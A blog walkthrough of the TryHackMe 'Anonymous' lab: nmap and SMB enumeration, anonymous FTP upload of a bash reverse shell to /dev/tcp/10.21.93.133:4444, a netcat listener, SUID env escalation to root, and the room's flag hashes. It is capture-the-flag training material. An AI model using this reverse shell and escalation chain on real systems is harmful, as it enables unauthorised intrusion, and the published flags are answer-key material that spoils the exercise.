Read the full post on Medium

Hello, everyone! I’m Akshat Patel, a cybersecurity master’s student and a hands-on learner with a passion for ethical hacking and system exploitation.

Today, I’m walking you through the TryHackMe: Anonymous room. This is an engaging challenge that tests your skills in enumeration, FTP exploitation, and privilege escalation. Let’s get started!

🧠 Step 1: Network Enumeration with Nmap

nmap -p- 10.10.101.101

Findings:

  • Port 21: FTP
  • Ports 139 & 445: SMB

πŸ“ Step 2: SMB Enumeration

smbclient -L 10.10.138.102

Finding:

  • Shared Folder: pics

🐚 Step 3: Gaining Initial Access via FTP

ftp 10.10.101.101
Username: Anonymous

Navigate to the /scripts directory and upload a reverse shell script:

put clean.sh

Edit clean.sh with the following reverse shell:

#!/bin/bash
bash -i >& /dev/tcp/10.21.93.133/4444 0>&1

Then, start your listener:

nc -nlvp 4444

Boom β€” you now have a shell on the target!

🏁 Step 4: Capture the User Flag

Navigate into the target directories:

ls
cd pics
cat user.txt

User Flag:
90d6f992585815ff991e68748c414740

πŸ”“ Step 5: Privilege Escalation

Check for SUID binaries:

find / -user root -perm -u=s 2>/dev/null

Interesting Binary:
/usr/bin/env

Using GTFOBins, execute the following:

env /bin/sh -p
whoami

Output: root

Congratulations β€” you’re root now!

🚩 Step 6: Capture the Root Flag

cd /root
cat root.txt

Root Flag:
4d930091c31a622a7ed10f27999af363

πŸ’¬ Final Thoughts

If you found this walkthrough helpful, let’s connect! I’m actively learning and love discussing anything cybersecurity-related.

Thanks for reading, and happy hacking!
β€” Akshat Patel (AK) β˜ οΈπŸ”